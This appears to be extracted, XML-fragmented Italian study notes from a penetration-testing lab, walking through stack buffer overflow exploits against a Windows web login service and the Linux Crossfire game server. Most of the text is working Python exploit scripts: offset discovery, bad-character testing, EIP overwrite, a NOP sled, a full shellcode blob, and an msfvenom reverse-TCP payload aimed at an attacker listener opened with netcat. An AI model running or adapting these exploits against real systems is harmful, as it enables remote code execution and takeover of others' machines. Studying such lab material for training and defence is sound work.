        <w:t xml:space="preserve">HTTP/1.1\r\n"</w:t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\\controllo EIP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buffer +=</w:t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x/52.0\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t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\n"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buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.socket</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(socket.AF_INET,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.SOCK_STREAM)</w:t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s.connect(("10.11.0.22",</w:t>
        <w:tab/>
        <w:t xml:space="preserve">80))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s.send(buffer)</w:t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s.close()</w:t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"\nDone!"</w:t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print "\nCould</w:t>
        <w:tab/>
        <w:t xml:space="preserve">not</w:t>
        <w:tab/>
        <w:t xml:space="preserve">connect!"</w:t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"Host:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10.11.0.22\r\n"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"User-Agent:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mozilla/5.0</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(X11;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Linux_86_64;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">rv:52.0)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Gecko/20100101</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Firefo</w:t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"Accept:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r</w:t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"Accept-Language:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">en-US,en;q=0.5\r\n"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"Referer:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">http://10.11.0.22/login\r\n"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"Connection:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">close\r\n"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"Content-Type:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">application/x-www-form-urlencoded\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Content-Length:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"+str(len(content))+"\r\n"</w:t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"\r\n"</w:t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kali@kali: locate pattern_create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kali@kali: msf-pattern_create -h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kali@kali: msf-pattern_create -l 800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*copirare contenuto*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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t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"\nSending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t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inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Aa0Aa1Aa2Aa3Aa4Aa5Aa...1Ba2Ba3Ba4Ba5Ba"</w:t>
        <w:tab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content</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"username="</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"&amp;password=A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">...</w:t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msf-pattern_offset -l 800 -q 4306142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//sapendo la posizione esatta dell' offset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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t>
        <w:tab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"\nSending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t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filler</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">780</w:t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eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"B"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">4</w:t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=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"C"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">16</w:t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inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">filler</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t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content</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"username="</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"&amp;password=A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">...</w:t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filler</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">780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eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"B"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">4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offset</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"C"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">4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=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"D"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(1500</w:t>
        <w:tab/>
        <w:t xml:space="preserve">- len(filler)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">- len(eip)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">- len(offset))</w:t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inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">filler</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">offset</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">...</w:t>
        <w:tab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 questa D sarà il nostro placeholder per il nostro shellcode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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t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badchars</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"</w:t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"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"</w:t>
        <w:tab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"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"</w:t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"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"</w:t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"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"</w:t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"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"</w:t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"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"</w:t>
        <w:tab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"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"</w:t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"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"</w:t>
        <w:tab/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"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"</w:t>
        <w:tab/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"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"</w:t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"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"</w:t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"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"</w:t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"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"</w:t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"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"</w:t>
        <w:tab/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"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">)</w:t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"\nSending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t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filler</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">780</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"B"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">4</w:t>
        <w:tab/>
        <w:t xml:space="preserve">offset</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"C"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">4</w:t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inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">filler</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">offset</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">badchars</w:t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content</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"username="</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"&amp;password=A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">...</w:t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0326744C</w:t>
        <w:tab/>
        <w:t xml:space="preserve">41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">41</w:t>
        <w:tab/>
        <w:t xml:space="preserve">03267454</w:t>
        <w:tab/>
        <w:t xml:space="preserve">42</w:t>
        <w:tab/>
        <w:t xml:space="preserve">42</w:t>
        <w:tab/>
        <w:t xml:space="preserve">42</w:t>
        <w:tab/>
        <w:t xml:space="preserve">42</w:t>
        <w:tab/>
        <w:t xml:space="preserve">43</w:t>
        <w:tab/>
        <w:t xml:space="preserve">43</w:t>
        <w:tab/>
        <w:t xml:space="preserve">43</w:t>
        <w:tab/>
        <w:t xml:space="preserve">43</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0326745C</w:t>
        <w:tab/>
        <w:t xml:space="preserve">01</w:t>
        <w:tab/>
        <w:t xml:space="preserve">02</w:t>
        <w:tab/>
        <w:t xml:space="preserve">03</w:t>
        <w:tab/>
        <w:t xml:space="preserve">04</w:t>
        <w:tab/>
        <w:t xml:space="preserve">05</w:t>
        <w:tab/>
        <w:t xml:space="preserve">06</w:t>
        <w:tab/>
        <w:t xml:space="preserve">07</w:t>
        <w:tab/>
        <w:t xml:space="preserve">08</w:t>
        <w:tab/>
        <w:t xml:space="preserve">03267464</w:t>
        <w:tab/>
        <w:t xml:space="preserve">09</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab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90</w:t>
        <w:tab/>
        <w:t xml:space="preserve">BC</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0326746C</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10</w:t>
        <w:tab/>
        <w:t xml:space="preserve">6C</w:t>
        <w:tab/>
        <w:t xml:space="preserve">C4</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">06</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">03267474</w:t>
        <w:tab/>
        <w:t xml:space="preserve">18</w:t>
        <w:tab/>
        <w:t xml:space="preserve">AB</w:t>
        <w:tab/>
        <w:t xml:space="preserve">26</w:t>
        <w:tab/>
        <w:t xml:space="preserve">03</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00</w:t>
        <w:tab/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AAAAAAAA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BBBBCCCC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//script finale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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t>
        <w:tab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"\nSending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t>
        <w:tab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shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">("\xbe\x55\xe5\xb6\x02\xda\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"</w:t>
        <w:tab/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"\x52\x31\x72\x12\x03\x72\x12\x83\x97\xe1\x54\xf7\xeb\x02\x1a"</w:t>
        <w:tab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"\xf8\x13\xd3\x7b\x70\xf6\xe2\xbb\xe6\x73\x54\x0c\x6c\xd1\x59"</w:t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"\xe7\x20\xc1\xea\x85\xec\xe6\x5b\x23\xcb\xc9\x5c\x18\x2f\x48"</w:t>
        <w:tab/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"\xdf\x63\x7c\xaa\xde\xab\x71\xab\x27\xd1\x78\xf9\xf0\x9d\x2f"</w:t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"\xed\x75\xeb\xf3\x86\xc6\xfd\x73\x7b\x9e\xfc\x52\x2a\x94\xa6"</w:t>
        <w:tab/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"\x74\xcd\x79\xd3\x3c\xd5\x9e\xde\xf7\x6e\x54\x94\x09\xa6\xa4"</w:t>
        <w:tab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"\x55\xa5\x87\x08\xa4\xb7\xc0\xaf\x57\xc2\x38\xcc\xea\xd5\xff"</w:t>
        <w:tab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"\xae\x30\x53\x1b\x08\xb2\xc3\xc7\xa8\x17\x95\x8c\xa7\xdc\xd1"</w:t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"\xca\xab\xe3\x36\x61\xd7\x68\xb9\xa5\x51\x2a\x9e\x61\x39\xe8"</w:t>
        <w:tab/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"\xbf\x30\xe7\x5f\xbf\x22\x48\x3f\x65\x29\x65\x54\x14\x70\xe2"</w:t>
        <w:tab/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"\x99\x15\x8a\xf2\xb5\x2e\xf9\xc0\x1a\x85\x95\x68\xd2\x03\x62"</w:t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"\x8e\xc9\xf4\xfc\x71\xf2\x04\xd5\xb5\xa6\x54\x4d\x1f\xc7\x3e"</w:t>
        <w:tab/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"\x8d\xa0\x12\x90\xdd\x0e\xcd\x51\x8d\xee\xbd\x39\xc7\xe0\xe2"</w:t>
        <w:tab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"\x5a\xe8\x2a\x8b\xf1\x13\xbd\xbe\x0e\x1b\x2f\xd7\x12\x1b\x4e"</w:t>
        <w:tab/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"\x9c\x9a\xfd\x3a\xf2\xca\x56\xd3\x6b\x57\x2c\x42\x73\x4d\x49"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"\x44\xff\x62\xae\x0b\x08\x0e\xbc\xfc\xf8\x45\x9e\xab\x07\x70"</w:t>
        <w:tab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"\xb6\x30\x95\x1f\x46\x3e\x86\xb7\x11\x17\x78\xce\xf7\x85\x23"</w:t>
        <w:tab/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"\x78\xe5\x57\xb5\x43\xad\x83\x06\x4d\x2c\x41\x32\x69\x3e\x9f"</w:t>
        <w:tab/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"\xbb\x35\x6a\x4f\xea\xe3\xc4\x29\x44\x42\xbe\xe3\x3b\x0c\x56"</w:t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"\x75\x70\x8f\x20\x7a\x5d\x79\xcc\xcb\x08\x3c\xf3\xe4\xdc\xc8"</w:t>
        <w:tab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"\x8c\x18\x7d\x36\x47\x99\x8d\x7d\xc5\x88\x05\xd8\x9c\x88\x4b"</w:t>
        <w:tab/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"\xdb\x4b\xce\x75\x58\x79\xaf\x81\x40\x08\xaa\xce\xc6\xe1\xc6"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x5f\xa3\x05\x74\x5f\xe6")</w:t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filler</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">780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eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x83\x0c\x09\x10"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">offset</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"C"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">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nops</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x90"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10</w:t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inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">filler</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">offset</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">nops</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">content</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"username="</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">inputBuffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"&amp;password=A"</w:t>
        <w:tab/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=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"POST</w:t>
        <w:tab/>
        <w:t xml:space="preserve">/login</w:t>
        <w:tab/>
        <w:t xml:space="preserve">HTTP/1.1\r\n"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"Host:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">10.11.0.22\r\n"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"User-Agent:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mozilla/5.0</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(X11;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Linux_86_64;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">rv:52.0)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Gecko/20100101</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Firefox/52.0\r\n"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"Accept:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r</w:t>
        <w:tab/>
        <w:t xml:space="preserve">\n"</w:t>
        <w:tab/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"Accept-Language:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">en-US,en;q=0.5\r\n"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"Referer:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">http://10.11.0.22/login\r\n"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"Connection:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">close\r\n"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"Content-Type:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">application/x-www-form-urlencoded\r\n"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Content-Length:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"+str(len(content))+"\r\n"</w:t>
        <w:tab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"\r\n"</w:t>
        <w:tab/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+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">content</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.socket</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(socket.AF_INET,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.SOCK_STREAM)</w:t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s.connect(("10.11.0.22",</w:t>
        <w:tab/>
        <w:t xml:space="preserve">80))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s.send(buffer)</w:t>
        <w:tab/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s.close()</w:t>
        <w:tab/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"\nDone</w:t>
        <w:tab/>
        <w:t xml:space="preserve">did</w:t>
        <w:tab/>
        <w:t xml:space="preserve">you</w:t>
        <w:tab/>
        <w:t xml:space="preserve">get</w:t>
        <w:tab/>
        <w:t xml:space="preserve">a</w:t>
        <w:tab/>
        <w:t xml:space="preserve">reverse</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shell?"</w:t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"\nCould</w:t>
        <w:tab/>
        <w:t xml:space="preserve">not</w:t>
        <w:tab/>
        <w:t xml:space="preserve">connect!"</w:t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kali@kali sudo nc -lnvp 443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---LINUX BUFFER OVERFLOW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Crossfire è un multiplayer role game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root@debian cd /usr/games/crossfire/bin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root@debian ... ./crossfire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root@debian # edb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run --&gt; Filter crossfire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script per effettuare il buffer overflow per vedere se è possibile farlo su Crossfire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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t>
        <w:tab/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host</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"10.11.0.128"</w:t>
        <w:tab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crash</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x41"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">4379</w:t>
        <w:tab/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=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x11(setup</w:t>
        <w:tab/>
        <w:t xml:space="preserve">sound</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">crash</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x90\x00#"</w:t>
        <w:tab/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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.socket(socket.AF_INET,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.SOCK_STREAM)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">print</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"[*]Sending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t>
        <w:tab/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s.connect((host,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">13327))</w:t>
        <w:tab/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s.recv(1024)</w:t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s.send(buffer)</w:t>
        <w:tab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s.close()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"[*]Payload</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sent</w:t>
        <w:tab/>
        <w:t xml:space="preserve">!"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---Controlling EIP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kali@kali msf-pattern_create -l 4379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kali@kali$ msf-pattern_offset -q 46367046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kali@kali$ msf-nasm_shell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nasm &gt; add eax,12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nasm &gt; jmp eax </w:t>
        <w:tab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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket</w:t>
        <w:tab/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host</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"10.11.0.128"</w:t>
        <w:tab/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padding</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x41"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">4368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eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x42\x42\x42\x42"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first_stage</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x83\xc0\x0c\xff\xe0\x90\x90"</w:t>
        <w:tab/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=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x11(setup</w:t>
        <w:tab/>
        <w:t xml:space="preserve">sound</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">padding</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">first_stage</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x90\x00#"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.socket(socket.AF_INET,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.SOCK_STREAM)</w:t>
        <w:tab/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"[*]Sending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t>
        <w:tab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s.connect((host,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">13327))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">print</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s.recv(1024)</w:t>
        <w:tab/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s.send(buffer)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s.close()</w:t>
        <w:tab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jumping ESP -&gt; EIP attraverso l' agent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generiamo una shell attraverso msfvenom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msfvenom</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-p</w:t>
        <w:tab/>
        <w:t xml:space="preserve">linux/x86/shell_reverse_tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">LHOST=10.11.0.4</w:t>
        <w:tab/>
        <w:t xml:space="preserve">LPORT=443</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-b</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x0</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0\x20"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-f</w:t>
        <w:tab/>
        <w:t xml:space="preserve">py</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-v</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode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script per il buffer overflow + la posizione esatta di EIP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#!/usr/bin/python</w:t>
        <w:tab/>
        <w:t xml:space="preserve">import</w:t>
        <w:tab/>
